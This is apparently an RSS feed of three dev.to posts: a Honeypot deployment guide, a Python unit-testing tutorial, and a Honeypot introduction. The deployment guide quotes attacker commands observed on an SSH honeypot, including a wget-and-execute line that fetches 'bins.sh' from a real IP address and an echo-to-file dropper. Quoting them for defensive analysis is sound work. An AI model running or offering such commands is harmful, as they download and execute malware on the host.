      <description>&lt;p&gt;This is part 2 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots.&lt;br&gt;&lt;br&gt;
An extended version of this article and an accompanying talk can be found at &lt;a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/"&gt;Virus Bulletin 2020&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The first step to data collection, which is also the most important one, is the deployment of Honeypots. There are multiple pitfalls and recommendations to consider depending on the use case. After a successful deployment, the next step is to collect generated data and possible payloads at a single data sink to enable metrics generation and monitoring of the complete infrastructure.&lt;/p&gt;
&lt;h2&gt;
  
  
  Deployment Considerations
&lt;/h2&gt;

&lt;p&gt;There are two main scenarios to consider when deploying Honeypots: internal versus internet-facing deployments. Both are valid scenarios but cover different use cases. For the remainder of this paper, we focus on internet-facing deployments for data collection unless stated otherwise.&lt;br&gt;
In an internal deployment, Honeypots can be considered traps or alert systems. The idea is to deploy them throughout the company infrastructure, preferably near production servers. An attacker looking for a foothold in the network may stumble upon these strategically placed systems and try to use them to persist access. Ideally, these Honeypots are set up to raise alarms whenever incoming connections are detected, as there is no legitimate use for them in daily operations. This scenario can support existing measures like Intrusion Detection Systems or log monitoring as an active component, increasing the chances of detecting intruders early.&lt;br&gt;&lt;br&gt;
Internet-facing deployments, on the other hand, are tailored towards collecting data on widespread attacks. This can range from basic information like attacked services (e.g. how common are attacks against Android Debug Bridges) or used credentials up to detailed TTP information (e.g. which commands/scripts are executed, attempted lateral movement, persistence techniques and possible evasion attempts). In contrast to internal deployments, these systems are constantly exposed to worldwide traffic. Therefore, they are always to be considered compromised. As these deployments aim to provide no direct protection to an internal network, it is advisable to isolate internet-facing Honeypots completely from production infrastructure. &lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5q4znBLJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/deployment.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5q4znBLJ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/deployment.png" alt='Graphic that shows two sample deplyoments. The left is titled "Internal Deployment", showing the honeypot being placed next to production servers. The right is titled "Internet-facing Deployment" and shows the honeypot deployed in a DMZ, separated from all other infrastructure.' width="880" height="508"&gt;&lt;/a&gt;&lt;br&gt;
Besides these specifics, we can also derive some general recommendations for all deployment scenarios.&lt;br&gt;&lt;br&gt;
As these systems are insecure by design, it is advisable to treat them accordingly. Leaving production data or company information on them is inadvisable, as is reusing usernames, passwords, certificates, and SSH keys. If attackers manage to escape from the Honeypot to the hosting OS, they would otherwise gain valuable information about internal infrastructure and active usernames.&lt;br&gt;&lt;br&gt;
Furthermore, it is strongly advised to run Honeypot services as a non-root user that has minimal permissions and is not able to use sudo. In the case of a Honeypot escape, this makes it considerably harder for attackers to escalate privileges. As most emulated services run in the range of system ports, which require elevated privileges, it is prudent to run them on non-system ports and use iptables forwarding rules to make them look like they are running on the system port.&lt;br&gt;&lt;br&gt;
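&lt;/p&gt;

&lt;p&gt;As a sketch of such a forwarding rule (the port numbers are examples, not taken from a specific deployment):&lt;/p&gt;

```
# Make a Honeypot that listens on unprivileged port 2222 appear
# to run on the SSH system port 22 (run once as root at setup).
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
```

&lt;p&gt;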
If Honeypots for common services like SSH and FTP are deployed, they should run on the services’ default ports. Especially for SSH, the means of access for most systems, it is recommended to disable password authentication and root login for the real SSH server, as well as to run it on a non-standard port to free up port 22 for the Honeypot. This also means that creating an SSH alias in local configs is recommended, to avoid connecting to the SSH Honeypot by accident when conducting maintenance or applying configuration changes.&lt;br&gt;&lt;br&gt;
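&lt;/p&gt;

&lt;p&gt;A minimal sketch of such an alias in &lt;code&gt;~/.ssh/config&lt;/code&gt; (host name, port and user are placeholders):&lt;/p&gt;

```
# "ssh pot-admin" always targets the real SSH daemon on its
# non-standard port - never the Honeypot listening on port 22.
Host pot-admin
    HostName honeypot.example.com
    Port 2222
    User opsuser
    PasswordAuthentication no
```

&lt;p&gt;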
Another consideration is the hosting service for the infrastructure. If it is not hosted on company-owned infrastructure, the idea of using a low-end VPS provider is compelling. Unfortunately, these are prone to being shut down in the context of &lt;a href="https://tech.slashdot.org/story/19/12/08/1549222/20-low-end-vps-providers-suddenly-shutting-down-in-a-deadpooling-scam"&gt;deadpooling scams&lt;/a&gt;, so it pays to be prepared to lose these systems at any time. In general, automated deployments based on tools like Ansible or Puppet should be used for reproducible results and to lower the risk of misconfigurations. Combined with a backup strategy for collected data, logs, and payloads, this ensures resilience against data loss.&lt;br&gt;&lt;br&gt;
Furthermore, it is recommended to minimize the usage of OS-based resources for the specific requirements of Honeypots. For example, local virtual environments for Python-based projects should be preferred over system-wide package installations to avoid dependency conflicts between multiple projects running on the same host, or OS updates that break dependencies.&lt;br&gt;&lt;br&gt;
Regarding operation, it is also advisable to monitor the regular functioning of deployed Honeypots, including storage utilization, ideally with automated tests tailored to the respective protocol.&lt;br&gt;&lt;br&gt;
Generally speaking, you’re exposing a system to the world that looks vulnerable - it most likely is vulnerable, but in other ways than you’d think. Honeypot deployments, especially internet-facing ones, are an asymmetrical playing field with an attacker advantage. Attackers have infinite ways and time to try attacks – the operator needs to make only one mistake to expose the Honeypot host and possibly the surrounding network to attacks.&lt;br&gt;&lt;br&gt;
Besides the deployment, there are more things to take into consideration. Attackers constantly try to detect Honeypots – with various techniques and varying success rates. A &lt;a href="https://media.ccc.de/v/32c3-7277-breaking_honeypots_for_fun_and_profit"&gt;talk detailing such flaws and their implications was held at 32c3&lt;/a&gt;. In the upcoming section, some commonly encountered detection techniques and possible workarounds are presented. These are merely pointers in the right direction. It is advisable to monitor your Honeypot infrastructure constantly and keep an eye out for disconnects that always happen after specific commands or workflows, as these can point to evasion strategies.  &lt;/p&gt;
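&lt;p&gt;Such monitoring can be partly automated. The following sketch is a hypothetical helper (the event and field names follow Cowrie’s JSON log format; the function itself is not part of any of the mentioned projects) that counts which command was the last one seen in each session - commands that dominate this list are candidates for checks the Honeypot fails:&lt;/p&gt;

```python
import json
from collections import Counter

def last_commands(log_lines):
    """Count the last command observed in each Cowrie session.

    Commands that frequently appear as the final input before a
    disconnect can point to evasion checks the Honeypot fails.
    """
    last_by_session = {}
    for line in log_lines:
        event = json.loads(line)
        # Cowrie writes one JSON object per line; command inputs carry
        # the eventid "cowrie.command.input" and a session identifier.
        if event.get("eventid") == "cowrie.command.input":
            last_by_session[event["session"]] = event["input"]
    return Counter(last_by_session.values())

# Two sample sessions that both disconnect right after the same command
logs = [
    '{"eventid": "cowrie.command.input", "session": "a1", "input": "uname -a"}',
    '{"eventid": "cowrie.command.input", "session": "a1", "input": "./retrieve"}',
    '{"eventid": "cowrie.command.input", "session": "b2", "input": "./retrieve"}',
]
print(last_commands(logs).most_common(1))  # [('./retrieve', 2)]
```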
&lt;h2&gt;
  
  
  Custom Configurations
&lt;/h2&gt;

&lt;p&gt;Many Honeypots come with a default set of emulated parameters – including Hostname, service version, and credentials. This is especially common in low and medium interaction Honeypots. In the context of Honeypot configurations, customization is the key to evasion mitigation.&lt;br&gt;&lt;br&gt;
As an example, consider the SSH Honeypot &lt;em&gt;Cowrie&lt;/em&gt;. In its unchanged default configuration, it used to accept the user &lt;code&gt;Richard&lt;/code&gt; with the password &lt;code&gt;fout&lt;/code&gt;, afterwards announcing that its system name is &lt;code&gt;svr04&lt;/code&gt;. Checking for default configurations like these is relatively easy and therefore happens quite often.&lt;br&gt;&lt;br&gt;
As a preventive measure, the footprint of the Honeypot should be as custom as possible. Announced hostnames, service versions and banners in particular are low-hanging fruit that can be changed. For low and medium interaction Honeypots, it can also be a valid strategy to change the outputs of emulated commands and create custom filesystem pickles to make the system even more unique.&lt;/p&gt;
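&lt;p&gt;For Cowrie, the most obvious changes boil down to a few lines of configuration. A sketch (the values are illustrative; the option names follow Cowrie’s &lt;code&gt;cowrie.cfg&lt;/code&gt;, so double-check them against your version):&lt;/p&gt;

```
# cowrie.cfg - override the telltale defaults
[honeypot]
hostname = db-prod-03

[ssh]
version = SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1
```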
&lt;h2&gt;
  
  
  Finding evasion tactics
&lt;/h2&gt;

&lt;p&gt;As a general recommendation, monitor your Honeypots closely, especially in the early days of a deployment while they are "fresh" and unknown. To stay with the example of Cowrie, evasion techniques can be spotted quite easily in the generated logs. In all cases, the command workflow on the system is the same up until a specific point where commands either fail or are not executed at all. A commonly observed pattern of actors on the Cowrie SSH Honeypot is to echo the raw script into a file and try to execute it subsequently.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;user@pot:~&lt;span class="nv"&gt;$ &lt;/span&gt;/bin/busybox &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-en&lt;/span&gt; &lt;span class="s1"&gt;'\x00\x00\x00\x00\xb4\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; retrieve
user@pot:~&lt;span class="nv"&gt;$ &lt;/span&gt;./retrieve
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This does not work on most low and medium interaction Honeypots, as they disown files created by the connected SSH user as soon as possible. As these files are then non-existent, the workflow of echoing the initial payload into a file and executing said file afterwards fails on these Honeypots, which can be considered a successful evasion.&lt;br&gt;
Another evasion technique commonly encountered is to download the payload and execute it in a second command. As discussed, this approach also leads to a successful evasion, as the file is no longer available to the user at the time of execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;user@pot:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; /&lt;span class="p"&gt;;&lt;/span&gt; wget http://45.148.10.175/bins.sh&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;chmod &lt;/span&gt;777 bins.sh&lt;span class="p"&gt;;&lt;/span&gt; sh bins.sh&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There are not many mitigations available for these issues. Due to the very nature of low and medium interaction Honeypots, the most viable mitigation is to switch to a high interaction system. High interaction Honeypots present a complete, persistent environment to an incoming connection that is often cached even through reconnects. This means that all dropped or downloaded payloads are available for execution instead of being snatched away by the Honeypot.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sanity Checks
&lt;/h2&gt;

&lt;p&gt;Sanity checks are also encountered quite often. As an initial example, consider an SMTP Honeypot. Attackers will try to connect to the mail server and send a test mail to their own infrastructure to check whether the server allows outbound mail traffic.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"timestamp"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"2020-06-14T08:57:00.854855"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"src_ip"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"0.0.0.0"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"src_port"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;54282&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"eventid"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"mailhon.data"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"envelope_from"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"spam@provider.com"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"envelope_to"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"spam@provider.com "&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
   &lt;/span&gt;&lt;span class="nl"&gt;"envelope_data"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"From: spam@provider.com&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Subject: 42.42.42.42&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;
        To: spam@provider.com&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Date: Sat, 13 Jun 2020 23:56:59 -0700&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;X-Priority: 3&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A possible mitigation is to allow the first mail from every connection to leave the Honeypot. Be advised that this bears legal implications, as the system is technically sending out spam.&lt;br&gt;&lt;br&gt;
Besides this fully-fledged production test, there are other sanity checks that can be observed. As a general guideline, deployed Honeypots should expose a configuration and sizing similar to their real-world counterparts. This can be achieved more easily on low and medium interaction HPs, as they often emulate commands by looking up text files, which massively eases the spoofing of cluster states, replica configurations or even filesystem sizes. &lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;As one can see, there is a lot to consider and check when deploying Honeypots. But don't fret - the work definitely pays off. It is very interesting to watch in real time what is happening on your systems. But looking at raw logs isn't that much fun, so join me in the next part for details on sighting and visualizing data!&lt;/p&gt;

</description>
      <category>malware</category>
      <category>honeypot</category>
      <category>threatintelligence</category>
      <category>security</category>
    </item>
    <item>
      <title>My Python Testing Best Practices</title>
      <dc:creator>Mat</dc:creator>
      <pubDate>Mon, 31 Aug 2020 17:28:27 +0000</pubDate>
      <link>https://dev.to/mat_zilla/my-python-testing-best-practices-2ef9</link>
      <guid>https://dev.to/mat_zilla/my-python-testing-best-practices-2ef9</guid>
      <description>&lt;p&gt;As someone who has been using Python professionally in the younger past, I found some best practices regarding testing and project setup that work well for me. Today I'd like to share them with you.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;TL;DR&lt;/strong&gt;: The repo containing demo code: &lt;a href="https://github.com/Maddosaurus/pytest-practice"&gt;Maddosaurus/pytest-practice&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Project Setup
&lt;/h2&gt;

&lt;p&gt;The project setup is based on Kenneth Reitz' &lt;a href="https://docs.python-guide.org/"&gt;Hitchhiker's Guide To Python&lt;/a&gt;. It follows the idea of a separate module accompanied by tests and supporting info on the same level (i.e. not contained in the module itself). This keeps the module lean and small.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Module containing the code&lt;/span&gt;
pytdemo/pytdemo.py
pytdemo/util.py
&lt;span class="c"&gt;# Testsuite&lt;/span&gt;
tests/conftest.py
tests/test_pytdemo.py
tests/test_util.py
&lt;span class="c"&gt;# Supporting information&lt;/span&gt;
.gitignore
LICENSE
README.md
requirements.txt
setup.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As one can see, the module itself only contains the bare essentials. The test suite is organized to roughly match the submodules, but this is an idea I only use for smaller modules. If submodules get larger and more complex, I tend to group tests by behaviour or logical groups.&lt;/p&gt;

&lt;h2&gt;
  
  
  Test Setup
&lt;/h2&gt;

&lt;p&gt;Personally, I'm using a wild mixture of &lt;a href="https://docs.pytest.org/en/stable/"&gt;pytest&lt;/a&gt;, &lt;a href="https://docs.python.org/3/library/unittest.mock.html#unittest.mock.MagicMock"&gt;unittest.mock.MagicMock&lt;/a&gt; and &lt;a href="https://requests-mock.readthedocs.io/en/latest/"&gt;requests-mock&lt;/a&gt; - the last one only if the module is using &lt;code&gt;requests&lt;/code&gt; directly to interact with REST APIs.&lt;br&gt;&lt;br&gt;
As a general recommendation, you should monitor your test coverage. To do that, I like to use &lt;a href="https://pytest-cov.readthedocs.io/en/latest/readme.html"&gt;pytest-cov&lt;/a&gt;, which is a powerful tool that can generate nice reports with the &lt;code&gt;--cov-report html&lt;/code&gt; option.&lt;br&gt;&lt;br&gt;
A word of caution: Aiming for 100% coverage is a great thing to do, but don't try to enforce it. This can end up being extremely tedious and sometimes impossible. Try to find smart goals instead, e.g. agreeing on covering all functionally important parts of your project.&lt;/p&gt;
&lt;h3&gt;
  
  
  The conftest File
&lt;/h3&gt;

&lt;p&gt;You might have noticed that there is a &lt;code&gt;conftest.py&lt;/code&gt; living in the &lt;code&gt;tests&lt;/code&gt; folder. This file is used to store shared &lt;a href="https://docs.pytest.org/en/stable/fixture.html"&gt;pytest fixtures&lt;/a&gt; that can be used in all test files. This is highly recommended, especially for helper functions and data sources.&lt;br&gt;&lt;br&gt;
In the example code you will find a fixture here that creates a custom instance of the main module with a URL pointing to localhost. This ensures that even if your mocked endpoints don't catch every call, you'll be the first to know (and also, we avoid hitting the real service with test-based requests).&lt;/p&gt;
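&lt;p&gt;A minimal sketch of such a fixture (the class and URL are invented for illustration and differ from the demo repo):&lt;/p&gt;

```python
# tests/conftest.py - shared fixtures for the whole test suite
import pytest

class CrtSh:
    """Stand-in for the module under test; takes the API base URL."""
    def __init__(self, base_url):
        self.base_url = base_url

@pytest.fixture
def crt_mock():
    # Point the instance at a local dummy URL so any request that
    # slips past the mocks fails loudly instead of hitting the
    # real service.
    return CrtSh(base_url="https://test.local/")
```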
&lt;h2&gt;
  
  
  Patching Monkeys
&lt;/h2&gt;

&lt;p&gt;There is one problem when writing tests: You want to test as small and free of side effects as possible. This can be achieved by mocking away all calls to other functions that the subject under test (SUT) makes. Pytest supports this with multiple mechanisms, &lt;a href="https://docs.pytest.org/en/stable/monkeypatch.html"&gt;&lt;code&gt;monkeypatch&lt;/code&gt;&lt;/a&gt; being my favourite for its balance between readability and explicitness.&lt;br&gt;&lt;br&gt;
As an example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_get_all_URL&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;crt_mock&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;monkeypatch&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# Set up a mock that will replace the requests module in CrtSh and use it
&lt;/span&gt;    &lt;span class="c1"&gt;# The MagicMock class comes in handy as it does a lot in the background for us.
&lt;/span&gt;    &lt;span class="n"&gt;requests_mock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;MagicMock&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;monkeypatch&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;setattr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pytdemo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"get"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;requests_mock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;crt_mock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"testhost.domain"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Check it the requests module was called with the correct URL
&lt;/span&gt;    &lt;span class="n"&gt;requests_mock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;assert_called_once_with&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="s"&gt;"https://test.local/"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s"&gt;"Identity"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"testhost.domain"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"output"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"json"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the example, the &lt;em&gt;get&lt;/em&gt; function of &lt;code&gt;requests&lt;/code&gt; is replaced with a custom &lt;code&gt;MagicMock&lt;/code&gt; object which records every call made to it.&lt;br&gt;&lt;br&gt;
As you can see, the test is divided into three parts:  &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Arrange - Set up all required vars, data and mocks&lt;/li&gt;
&lt;li&gt;Act - Call the SUT&lt;/li&gt;
&lt;li&gt;Assert - Check the result for correctness
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This threefold structure improves readability - conventions often help to make your job as a team easier. It is actually a well-known pattern called &lt;a href="https://freecontent.manning.com/making-better-unit-tests-part-1-the-aaa-pattern/"&gt;AAA - Arrange, Act, Assert&lt;/a&gt; and I recommend reading a bit more about it if you're interested in writing better Unit Tests.&lt;/p&gt;

&lt;p&gt;As you can see, combining different Python tools for testing can yield a very powerful setup that allows you to build your tests quickly and easily.&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;I'm merely scratching the surface with this post. There are many more modules and best practices I'd like to share over time that ease your life as a Python dev.&lt;br&gt;&lt;br&gt;
For now, keep in mind that testing might feel like it is slowing you down but in fact ensures that you keep your current speed. Writing good Unit Tests ensures that all the parts in your module work as intended and keep working as intended - even when you're changing and refactoring the code. This also means that you should run your tests often, so please make sure that they execute as fast as possible.&lt;br&gt;&lt;br&gt;
Finally, maybe the most important tests you'll write are the ones that are created in the context of a bug ticket:&lt;br&gt;&lt;br&gt;
Try reproducing the bug with a Unit Test first before attempting to fix it. With this order of operations you ensure that the bug is actually fixed and that it won't come back at a later stage, so get testing!&lt;/p&gt;
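&lt;p&gt;A tiny, hypothetical illustration of that workflow (the function and the bug are invented for the example): the test is derived from the ticket first, fails against the buggy code, and then guards the fix against regressions:&lt;/p&gt;

```python
def slug(title):
    """Turn a post title into a URL slug.

    The bug ticket reported that "My  Post" produced "my--post";
    splitting on runs of whitespace (str.split with no argument)
    drops the empty parts and fixes it.
    """
    return "-".join(title.lower().split())

# Regression test derived from the bug ticket - written *before* the fix
def test_slug_collapses_repeated_whitespace():
    assert slug("My  Post") == "my-post"

test_slug_collapses_repeated_whitespace()
```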

</description>
      <category>python</category>
      <category>unittesting</category>
      <category>howto</category>
    </item>
    <item>
      <title>What are Honeypots and why do I want them?</title>
      <dc:creator>Mat</dc:creator>
      <pubDate>Fri, 19 Jun 2020 08:59:27 +0000</pubDate>
      <link>https://dev.to/mat_zilla/what-are-honeypots-and-why-do-i-want-them-2ef8</link>
      <guid>https://dev.to/mat_zilla/what-are-honeypots-and-why-do-i-want-them-2ef8</guid>
      <description>&lt;p&gt;Honeypots can provide valuable insights into the threat landscape, both in the open internet as well as your internal network. Deploying them right is not always straightforward, just like interpreting any activity on them.&lt;/p&gt;

&lt;p&gt;This is part 1 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots. &lt;br&gt;
An extended version of this article and an accompanying talk can be found at &lt;a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/"&gt;Virus Bulletin 2020&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;As attacks on internet-facing infrastructure have shifted to being mostly automated in recent years, Honeypots lost some of their relevance for detecting novel exploits and attacks on said infrastructure. Combined with the fact that the people running Honeypots usually don’t want to give away details on how they customized them to keep them from being detected, this leads to a situation where the value of running them got upstaged. Although the way attackers operate has changed, Honeypots still allow valuable insights into ongoing campaigns, used credentials and distributed payloads.  &lt;/p&gt;

&lt;p&gt;To understand what value Honeypots bring to the table, it is imperative to know what they are used for.&lt;br&gt;&lt;br&gt;
Basically, Honeypots mimic systems that look vulnerable and therefore are valuable targets for attacks. This can either be a vulnerable-looking service (e.g. SSH, Elastic) or client (e.g. browsers).&lt;br&gt;&lt;br&gt;
The latter emulates a browser to find websites that, for example, try to execute malicious payloads on clients, like JavaScript cryptominers or drive-by downloads. &lt;br&gt;
The former emulates a complete server or protocol to find tools, techniques and procedures used by malicious actors. Such Honeypots can be used to uncover, for example, attacks tailored to take over publicly accessible IoT devices or ransom unsecured MongoDB instances.&lt;br&gt;&lt;br&gt;
Server-side Honeypots can further be grouped into three categories based on the level of emulation they provide: Low, Medium and High Interaction Honeypots.&lt;br&gt;
Low interaction Honeypots are rather easy to build, as they often emulate only the basic commands of a protocol. For SSH, a low interaction HP can consist only of the login dialog to collect usernames and passwords potentially used in credential stuffing attacks.&lt;br&gt;&lt;br&gt;
Medium interaction Honeypots take this principle a step further and emulate more commands and part of the surrounding system. As an example, the medium interaction HP &lt;a href="https://github.com/cowrie/cowrie"&gt;Cowrie&lt;/a&gt; emulates a complete filesystem as well as many integrated system commands like lsof or netstat to look like a fully running system.&lt;br&gt;&lt;br&gt;
Finally, high interaction Honeypots represent a fully functioning implementation of the protocol in question, often made available through a Man-in-the-Middle (MitM) proxy which logs every interaction with the HP. For SSH this is represented by &lt;a href="https://github.com/eg-cert/dockpot"&gt;Dockpot&lt;/a&gt;, which is a HP that is running a full Linux system in an image, exposing the SSH connection through a MitM proxy that logs all interactions and issued commands. For every connection from a distinct source IP, a new container is created and kept until a timeout is reached. This not only enables connection separation but also persistence across connections, as the attacker finds the filesystem with all changes and additions made during the first connection.&lt;br&gt;
All three groups have their advantages and use cases. While detail and insight grow from using low to high interaction Honeypots, the error potential, attack surface, hardware demand and general complexity increase as well.&lt;br&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Lg8ytlM_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/interaction-stack.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Lg8ytlM_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://maddosaurus.github.io/images/interaction-stack.png" alt="Graphic that illustrates that detail and insight grow when moving from low to high interaction honeypots, but that also error potential, attack surface, hw demand and complexity grow."&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Low and medium interaction HPs are often developed as scripts run by an interpreter, e.g. Python. While they provide limited insight and are relatively easy to detect, they can be installed on virtually any OS that is able to run a fitting Python distribution. This could be anything ranging from a Raspberry Pi up to fully fledged standalone hardware or cloud deployments.&lt;br&gt;&lt;br&gt;
High interaction HPs are often based on virtualization or containerization technologies and require a more advanced setup. This includes using sufficiently powerful hardware, configuring the abstraction layer, and setting up VMs or containers.&lt;br&gt;&lt;br&gt;
Therefore, goals, budget, and time constraints should be known before deciding which Honeypot will be deployed.  &lt;/p&gt;

</description>
      <category>malware</category>
      <category>honeypot</category>
      <category>threatintelligence</category>
      <category>security</category>
    </item>
  </channel>
</rss>
